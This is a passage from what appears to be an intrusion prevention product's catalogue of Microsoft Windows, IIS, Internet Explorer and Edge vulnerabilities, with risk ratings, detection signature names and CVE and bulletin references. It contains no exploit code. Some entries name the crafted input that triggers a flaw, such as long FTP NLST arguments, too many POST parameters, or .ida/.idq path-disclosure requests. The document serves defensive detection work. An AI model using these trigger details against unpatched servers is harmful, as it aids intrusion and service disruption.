http://technet.microsoft.com/security/bulletin/MS09-013

Microsoft-HTTP.sys-HTTP-2.0-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-755-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There exists a denial-of-service vulnerability in Microsoft Windows' HTTP 2.0 protocol stack.

Situation:

HTTPS_CS-Microsoft-HTTP.sys-HTTP-2.0-Denial-Of-Service

References:

CVE-2016-0150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0150

MS16-049
http://technet.microsoft.com/security/bulletin/MS16-049

Microsoft-Hyperlink-Object-Library-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-733-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

The Hyperlink Object Library has a vulnerability that may allow an attacker to cause it to improperly disclose the contents of its memory.

Situation:

File-OLE_Microsoft-Hyperlink-Object-Library-Information-Disclosure

References:

CVE-2016-0059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0059

MS16-009
http://technet.microsoft.com/security/bulletin/MS16-009

Microsoft-Ie-CVE-2016-7198

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-819-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

A vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Ie-CVE-2016-7198

References:

CVE-2016-7198
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7198

MS16-142
http://technet.microsoft.com/security/bulletin/MS16-142

Microsoft-Ie-ExecScript-File-Disclosure

About this vulnerability:	Microsoft IE ExecScript File Disclosure
Risk:	High
First detected in:	sgpkg-ips-631-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	Internet Explorer 5.0; Internet Explorer 6.0
Type:	Input Validation
Description:	There exists a vulnerability in Internet Explorer.
Situation:	File-Text_Microsoft-Ie-ExecScript-File-Disclosure-Vulnerability

Microsoft-Ie-NMSA.ASFSourceMediaDescription-DoS-Vulnerability

About this vulnerability:

Microsoft Ie NMSA.ASFSourceMediaDescription DoS Vulnerability.

Risk:

High

First detected in:

sgpkg-ips-676-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

A vulnerability exists in Microsoft Internet Explorer 6 which allows remote attackers to cause a denial of service condition by creating an AcitveXObject with a long dispValue property.

Situation:

File-Text_Microsoft-Ie-NMSA.ASFSourceMediaDescription-DoS-Vulnerability

References:

CVE-2006-3897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3897

BID-19114
http://www.securityfocus.com/bid/19114

OSVDB-27232
http://www.osvdb.org/27232

Microsoft-Ie-PNG-Parsing-Vulnerability-CVE-2015-0080

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-633-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer

Situation:

File-PNG_Microsoft-Ie-PNG-Parsing-Vulnerability-CVE-2015-0080

References:

CVE-2015-0080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0080

BID-72909
http://www.securityfocus.com/bid/72909

MS15-024
http://technet.microsoft.com/security/bulletin/MS15-024

Microsoft-Ie-RDS.DataControl.URL-DoS

About this vulnerability:

Microsoft Ie RDS.DataControl.URL DoS Vulnerability.

Risk:

High

First detected in:

sgpkg-ips-676-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

A vulnerability exists in Microsoft Internet Explorer 6 which allows remote attackers to cause a denial of service condition by operations that result in invalid length calculations when using SysAllocStringLen.

Situation:

File-Text_Microsoft-Ie-RDS.DataControl.URL-DoS

References:

CVE-2006-3510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3510

BID-18900
http://www.securityfocus.com/bid/18900

OSVDB-26955
http://www.osvdb.org/26955

Microsoft-Ie-setHomePage-Function-Vulnerability

About this vulnerability:

Microsoft Ie setHomePage Function Vulnerability

Risk:

High

First detected in:

sgpkg-ips-631-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Internet Explorer 6.0; Internet Explorer 7.0

Type:

Input Validation

Description:

There exists a vulnerability in Internet Explorer.

Situation:

File-Text_Microsoft-Ie-setHomePage-Function-Vulnerability

References:

CVE-2009-3943
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3943

Microsoft-Ie-Use-After-Free-CVE-2016-7196

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-819-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

A vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Ie-Use-After-Free-CVE-2016-7196

References:

CVE-2016-7196
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7196

MS16-142
http://technet.microsoft.com/security/bulletin/MS16-142

Microsoft-IIS-5.0-WebDav-Request-Directory-Security-Bypass

About this vulnerability:

A security bypass vulnerability exists in the Microsoft Internet Information Services (IIS) product.

Risk:

High

First detected in:

sgpkg-ips-356-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IIS 5.0

Type:

Input Validation

Description:

A security bypass vulnerability exists in the Microsoft Internet Information Services (IIS) product. The vulnerability is due to the way IIS handles WebDAV requests for web pages requiring authentication. A remote attacker can exploit the vulnerability to bypass access restrictions on resources that require authentication.

Situation:

HTTP_CSH-Microsoft_IIS_5.0_WebDav_Request_Directory_Security_Bypass

References:

CVE-2009-1122
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1122

BID-35232
http://www.securityfocus.com/bid/35232

MS09-020
http://technet.microsoft.com/security/bulletin/MS09-020

Microsoft-IIS-6-ScStoragePathFromUrl-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft IIS 6 server

Risk:

High

First detected in:

sgpkg-ips-870-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2003

Software:

IIS 6.0

Type:

Buffer Overflow

Description:

There exists a vulnerability in Windows Server 2003 R2 IIS. The vulnerability allows arbitrary remote code execution on the target system via forged HTTP headers.

Situation:

HTTP_CSH-Microsoft-IIS-6-ScStoragePathFromUrl-Buffer-Overflow
HTTP_CSH-Microsoft-IIS-6-ScStoragePathFromUrl-Buffer-Overflow-2

References:

CVE-2017-7269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7269

BID-97127
http://www.securityfocus.com/bid/97127

Microsoft-IIS-7.x-Server-Header

About this vulnerability:	Microsoft IIS 7.x server header, not vulnerability.
Risk:	Low
First detected in:	sgpkg-ips-238-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	IIS
Type:	Malfunction
Description:	This is not a vulnerability.
Situation:	HTTP_SHS-Microsoft-IIS-7.x-Server-Header

Microsoft-IIS-Cachuri-Tree_Hash_Table-Denial-of-Service

About this vulnerability:

A vulnerability in Microsoft Internet Information Services.

Risk:

High

First detected in:

sgpkg-ips-1502-5242

Last changed:

sgpkg-ips-1502-5242

Platform:

Windows

Software:

<os>

Type:

Insecure Configuration

Description:

A vulnerability in the Cachuri Module of Microsoft Internet Information Services, in multiple Windows OS versions, which allows remote attackers to cause a denial of service condition by sending crafted requests, due to an inefficient algorithmic complexity weakness in the implementation of the TREE_HASH_TABLE hash table.

Situation:

HTTP_CSU-Microsoft-IIS-Cachuri-Tree_Hash_Table-Denial-of-Service

References:

CVE-2022-22025
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22025

Microsoft-IIS-Cmdasp.asp

About this vulnerability:	Microsoft IIS Cmdasp.asp
Risk:	Moderate
First detected in:	sgpkg-ips-631-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	IIS 5.0; IIS 4.0
Type:	Malfunction
Description:	A vulnerability exists in Microsoft IIS CmdAsp that could allow remote attackers to gain priviliges.
Situation:	HTTP_CSU-Microsoft-IIS-Cmdasp.asp-Access

Microsoft-IIS-Directory-Authentication-Security-Bypass

About this vulnerability:

A security bypass vulnerability in Microsoft Internet Information Services

Risk:

Critical

First detected in:

sgpkg-ips-321-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

IIS

Type:

Input Validation

Description:

There is a security bypass vulnerability in Microsoft Internet Information Services. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a vulnerable Microsoft IIS server to bypass security check to list and download files. On non-default installations, an attacker can potentially upload files into a password protected directory and execute arbitrary code with the privileges of the Internet Guest Account.

Situation:

HTTP_CSU-Microsoft-IIS-Directory-Authentication-Security-Bypass

References:

CVE-2010-2731
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2731

BID-41314
http://www.securityfocus.com/bid/41314

Microsoft-IIS-FTP-Denial-Of-Service-CVE-2009-2521

About this vulnerability:

A vulnerability in Microsoft Internet Information Server

Risk:

High

First detected in:

sgpkg-ips-257-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS 5.0; IIS 5.1; IIS 6.0; IIS 7.0

Type:

Malfunction

Description:

There is a denial of service vulnerability in Microsoft Internet Information Server.

Situation:

FTP_CS-Microsoft-IIS-FTP-Denial-Of-Service-CVE-2009-2521

References:

CVE-2009-2521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521

MS09-053
http://technet.microsoft.com/security/bulletin/MS09-053

Microsoft-IIS-FTP-Server-Nlst-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the handling of NLST argument

Risk:

Critical

First detected in:

sgpkg-ips-241-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported for Microsoft Internet Information Services (IIS). The vulnerability is due to insufficient bounds checking when processing an FTP NLST command. A remote authenticated attacker can craft an FTP session to exploit this vulnerability. Successful exploitation would allow an attacker to inject and execute arbitrary code on the target system with the security privileges of the user System. If code execution is not successful, the affected application will terminate abnormally causing a denial of service condition.

Situation:

FTP_CS-IIS-Nlst-BOF

References:

CVE-2009-3023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3023

BID-36189
http://www.securityfocus.com/bid/36189

MS09-053
http://technet.microsoft.com/security/bulletin/MS09-053

Microsoft-IIS-FTP-Server-Telnet-IAC-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Internet Information Services

Risk:

Moderate

First detected in:

sgpkg-ips-374-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 2008 R2

Software:

IIS 7.5

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in the Microsoft Internet Information Services (IIS) FTP service. The vulnerability is due to a memory corruption encountered when encoding Telnet IAC characters in a FTP response. A remote unauthenticated attacker may exploit this vulnerability by sending a crafted FTP request to a target server. Successful exploitation can lead to execution of arbitrary code or a denial of service condition of FTP services.

Situation:

FTP_CS-Microsoft-IIS-FTP-Server-Telnet-IAC-Buffer-Overflow

References:

CVE-2010-3972
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3972

BID-45542
http://www.securityfocus.com/bid/45542

MS11-004
http://technet.microsoft.com/security/bulletin/MS11-004

Microsoft-IIS-HTTP-Protocol-Stack-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows 10

Risk:

Moderate

First detected in:

sgpkg-ips-1350-5242

Last changed:

sgpkg-ips-1350-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A design weakness in the UlpParseAcceptEncoding method causes a vulnerability in Microsoft IIS. A successful attack can allow an attacker to execute arbitrary code on the target system or cause a denial of service condition.

Situation:

HTTP_CRH-Microsoft-IIS-HTTP-Protocol-Stack-Remote-Code-Execution

References:

CVE-2021-31166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31166

Microsoft-IIS-IDA-Path-Disclosure

About this vulnerability:

Microsoft IIS IDA Path Disclosure vulnerability.

Risk:

High

First detected in:

sgpkg-ips-674-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IIS 4.0

Type:

Configuration Error

Description:

A vulnerability exists in IIS 4.0 which allows remote attackers to obtain the real pathname of the document by requesting non-existent files with .ida or .idq extensions.

Situation:

HTTP_CS-Microsoft-IIS-IDA-Path-Disclosure

References:

CVE-2000-0071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0071

BID-1065
http://www.securityfocus.com/bid/1065

Microsoft-IIS-Multiple-Extensions-Security-Bypass

About this vulnerability:

A vulnerability in Microsoft Internet Information Services (IIS)

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS 6.0

Type:

Malfunction

Description:

A security bypass vulnerability exists in Microsoft IIS web server. This vulnerability is due to an design error while handling file names which contain multiple extensions. Note that IIS must be in a non-default configuration for this vulnerability to occur. An attacker can exploit this vulnerability by uploading and executing files using a third party application, even if that application restricts the upload of files based on the file's extension.

Situation:

HTTP_CSU-Microsoft-IIS-Multiple-Extensions-Security-Bypass

References:

CVE-2009-4444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4444

BID-37460
http://www.securityfocus.com/bid/37460

Microsoft-IIS-Remote-Code-Execution-CVE-2015-1635

About this vulnerability:

A vulnerability in Microsoft IIS

Risk:

High

First detected in:

sgpkg-ips-638-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 8; Windows 8.1; Windows 2012; Windows 2012 R2

Software:

IIS

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported in Microsoft HTTP.sys. The vulnerability is due to an issue with the processing of HTTP messages in the HTTP protocol stack. A remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted HTTP request to a vulnerable server.

Situation:

HTTP_CSH-Microsoft-Remote-Code-Execution-IIS-CVE-2015-1635

References:

CVE-2015-1635
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635

MS15-034
http://technet.microsoft.com/security/bulletin/MS15-034

Microsoft-IIS-Repeated-Parameter-Request-CVE-2010-1899

About this vulnerability:

A vulnerability in Microsoft IIS

Risk:

High

First detected in:

sgpkg-ips-338-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS 5.1; IIS 6.0; IIS 7.0; IIS 7.5

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Information Services (IIS).

References:

CVE-2010-1899
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1899

MS10-065
http://technet.microsoft.com/security/bulletin/MS10-065

Microsoft-IIS-Repeated-Parameter-Request-Denial-Of-Service

About this vulnerability:

Microsoft IIS crashes when sent malicious POST request with too many name-value pairs

Risk:

High

First detected in:

sgpkg-ips-344-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Malfunction

Description:

Microsoft IIS has a vulnerability which is due to stack exhaustion while processing HTTP request to ASP resources. A remote unauthenticated attacked can exploit this flaw by sending a POST request with too many name-value pairs.

Situation:

HTTP_CS-Large-Number-Of-Parameters-In-POST-Request
HTTP_CRL-Too-Many-Parameters-In-GET-Request

References:

CVE-2010-1899
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1899

BID-43140
http://www.securityfocus.com/bid/43140

MS10-065
http://technet.microsoft.com/security/bulletin/MS10-065

Microsoft-IIS-Request-Header-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Internet Information Services

Risk:

Moderate

First detected in:

sgpkg-ips-375-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS 7.5

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in Microsoft Internet Information Services (IIS) when FastCGI is enabled. The vulnerability is due to a heap buffer overflow error when processing unexpected number of headers in an HTTP request. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to a target server. Successful exploitation would allow an attacker to inject and execute arbitrary code on the target system with the security privileges of the IIS Worker process. Unsuccessful exploitation could create a denial-of-service (DoS) condition when the service reaches its restart limit.

Situation:

HTTP_CS-Microsoft-IIS-Request-Header-Buffer-Overflow

References:

CVE-2010-2730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2730

BID-43138
http://www.securityfocus.com/bid/43138

MS10-065
http://technet.microsoft.com/security/bulletin/MS10-065

Microsoft-IIS-Schannel-Improper-Certificate-Verification

About this vulnerability:

Microsoft IIS Schannel Improper Certificate Verification vulnerability.

Risk:

High

First detected in:

sgpkg-ips-687-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft IIS SChannel

Type:

Insecure Configuration

Description:

A vulnerability in Microsoft IIS Secure Channel when certificate authentication is used, due to no proper validation of the client's key exchange data in the TLS handshake message, which allows remote attackers to spoof authentication by crafting a TLS packet based on the knowlege of the certificate.

Situation:

Generic_CS-Microsoft-IIS-Schannel-Improper-Certificate-Verification

References:

CVE-2009-0085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0085

OSVDB-52521
http://www.osvdb.org/52521

MS09-007
http://technet.microsoft.com/security/bulletin/MS09-007

Microsoft-IIS-Server-Crafted-Asp-Page-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the handling of crafted ASP pages in IIS

Risk:

Moderate

First detected in:

sgpkg-ips-73-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the handling of crafted ASP pages in IIS. A remote attacker can exploit this vulnerability by uploading a crafted ASP page containing an excessively long include file parameter to the target host and then requesting it, which can enable arbitrary code execution with the privileges of the vulnerable web server.

Situation:

HTTP_CS-Excessively-Long-Asp-Include-File-Argument
FTP_UL-Excessively-Long-Asp-Include-File-Argument
File-Text_Excessively-Long-Asp-Include-File-Argument

References:

CVE-2006-0026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0026

BID-18858
http://www.securityfocus.com/bid/18858

OSVDB-27152
http://www.osvdb.org/27152

MS06-034
http://technet.microsoft.com/security/bulletin/MS06-034

Microsoft-IIS-UNC-Path-Disclosure-Vulnerability

About this vulnerability:

HTTP-request to .ida or .idq -files detected

Risk:

Low

First detected in:

sgpkg-ips-499-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000

Software:

IIS

Type:

Configuration Error

Description:

Requesting non-existent files with .ida or .idq -extensions allows the attacker to get the real document root pathname in IIS 4.0.

Situation:

HTTP_CSU-Microsoft-IIS-UNC-Path-Disclosure-Vulnerability

References:

CVE-2000-0071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0071

BID-1065
http://www.securityfocus.com/bid/1065

Microsoft-IIS-UNC-Path-Source-Disclosure

About this vulnerability:

A vulnerability in Microsoft Internet Information Server

Risk:

Moderate

First detected in:

sgpkg-ips-254-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS 4.0; IIS 5.0

Type:

Malfunction

Description:

There is a source code disclosure vulnerability in Microsoft Internet Information Server. A crafted URL that contains a backslash character may be used to show the source code of active server pages (ASP).

Situation:

HTTP_CSU-Microsoft-IIS-UNC-Path-Source-Disclosure

References:

CVE-2000-0246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0246

BID-1081
http://www.securityfocus.com/bid/1081

MS00-019
http://technet.microsoft.com/security/bulletin/MS00-019

Microsoft-Indeo-Codec-Insecure-Library-Loading-Vulnerability

About this vulnerability:

Detected attempt to exploit a vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-440-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Code Injection

Description:

There is a library loading vulnarability in Microsoft Windows

Situation:

HTTP_CSU-Microsoft-Indeo-Codec-Insecure-Library-Loading-Vulnerability
SMB-TCP_CHS_Microsoft-Indeo-Codec-Insecure-Library-Loading-Vulnerability

References:

CVE-2010-3138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3138

OSVDB-67551
http://www.osvdb.org/67551

MS12-014
http://technet.microsoft.com/security/bulletin/MS12-014

Microsoft-Internet-Connection-Wizard-Insecure-Loading-CVE-2010-3144

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-362-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows.

Situation:

HTTP_CSU-Microsoft-Internet-Connection-Wizard-Insecure-Loading-CVE-2010-3144

References:

CVE-2010-3144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3144

MS10-097
http://technet.microsoft.com/security/bulletin/MS10-097

Microsoft-Internet-Explorer-7-WebDAV-Pathname-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-586-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 2008

Software:

Internet Explorer 7.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer 7. The flaw is due to a boundary error when handling overly long WebDAV pathname strings. An attacker can exploit this vulnerability by persuading the target user to open a malicious web page. Successful attack could allow for arbitrary code injection and execution with privileges of the currently logged on user. Note that Assurent has not been able to reproduce the vulnerability during the contractual research period. An attack targeting this vulnerability can result in the injection and execution of arbitrary code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any injected code will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, the application would terminate abnormally.

Situation:

File-Text_Microsoft-Internet-Explorer-7-WebDAV-Pathname-Code-Execution

References:

CVE-2008-4259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4259

BID-32586
http://www.securityfocus.com/bid/32586

MS08-073
http://technet.microsoft.com/security/bulletin/MS08-073

Microsoft-Internet-Explorer-8-Developer-Tools-Code-Execution-CVE-2010-0811

About this vulnerability:

A code execution vulnerability in the Microsoft Internet Explorer 8 Developer Tools

Risk:

High

First detected in:

sgpkg-ips-310-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a remote code execution vulnerability in the Microsoft Internet Explorer 8 Developer Tools.

Situation:

HTTP_SS-Internet-Explorer-8-Developer-Tools-Code-Execution-CVE-2010-0811

References:

CVE-2010-0811
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0811

MS10-034
http://technet.microsoft.com/security/bulletin/MS10-034

Microsoft-Internet-Explorer-8-Ieshims.dll-Insecure-Library-Loading

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-385-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0

Type:

Malfunction

Description:

A code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer handles the loading of IESHIMS.DLL. A remote attacker can exploit this vulnerability by enticing a target user to save a maliciously crafted dynamic link library (DLL) file on the desktop or modify the system variable PATH. Upon starting the Internet Explorer 8, the malicious DLL will be loaded and executed. In a successful attack the behaviour of the target host is entirely dependent on the intended function of the malicious DLL. The code, in this case, would execute within the security context of the currently logged in user.

Situation:

HTTP_CRL-Microsoft-Internet-Explorer-8-Ieshims.dll-Insecure-Library-Loading
SMB-TCP_SMB-Microsoft-Internet-Explorer-8-Ieshims.dll-Insecure-Library-Loading

References:

CVE-2011-0038
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0038

BID-46159
http://www.securityfocus.com/bid/46159

OSVDB-70833
http://www.osvdb.org/70833

MS11-003
http://technet.microsoft.com/security/bulletin/MS11-003

Microsoft-Internet-Explorer-Address-Bar-Spoofing-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Low

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer 5.0; Internet Explorer 6.0

Type:

Malfunction

Description:

There exists a vulnerability in Internet Explorer versions 5 and 6.

Situation:

File-Text_Microsoft-Internet-Explorer-Address-Bar-Spoofing-Vulnerability

References:

CVE-2004-2219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2219

BID-10943
http://www.securityfocus.com/bid/10943

Microsoft-Internet-Explorer-And-Edge-Blocksite.htm-Spoofing

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-866-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge; Internet Explorer 11.0

Type:

Input Validation

Description:

There exists a website spoofing vulnerability in Microsoft Internet Explorer and Edge.

Situation:

File-Text_Microsoft-Internet-Explorer-And-Edge-Blocksite.htm-Spoofing

References:

CVE-2017-0033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0033

MS17-006
http://technet.microsoft.com/security/bulletin/MS17-006

Microsoft-Internet-Explorer-And-Edge-Column-span-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Edge; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a type confusion vulnerability in the HandleColumnBreakOnColumnSpanningElement function of Microsoft Internet Explorer and Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Internet-Explorer-And-Edge-Column-span-Type-Confusion

References:

CVE-2017-0037
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0037

Microsoft-Internet-Explorer-And-Edge-CVE-2015-6140-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-713-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer and Edge.

Situation:

File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2015-6140-Memory-Corruption

References:

CVE-2015-6140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6140

MS15-124
http://technet.microsoft.com/security/bulletin/MS15-124

Microsoft-Internet-Explorer-And-Edge-CVE-2016-0061-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0; Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Microsoft Internet Explorer and Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-0061-Type-Confusion

References:

CVE-2016-0061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0061

MS16-009
http://technet.microsoft.com/security/bulletin/MS16-009

Microsoft-Internet-Explorer-And-Edge-CVE-2016-0154-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-756-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer and Edge.

Situation:

File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-0154-Memory-Corruption

References:

CVE-2016-0154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0154

MS16-037
http://technet.microsoft.com/security/bulletin/MS16-037

Microsoft-Internet-Explorer-And-Edge-CVE-2016-3247-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-803-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

A vulnerability in Microsoft Edge

Situation:

File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-3247-Memory-Corruption

References:

CVE-2016-3247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3247

MS16-104
http://technet.microsoft.com/security/bulletin/MS16-104

Microsoft-Internet-Explorer-And-Edge-CVE-2016-3325-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-803-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists an information disclosure vulnerability in Microsoft Internet Explorer and Edge. A remote attacker can use this to access sensitive information.

Situation:

HTTP_SHS-Suspicious-Reply

References:

CVE-2016-3325
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3325

MS16-105
http://technet.microsoft.com/security/bulletin/MS16-105

Microsoft-Internet-Explorer-And-Edge-CVE-2016-3351-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Edge

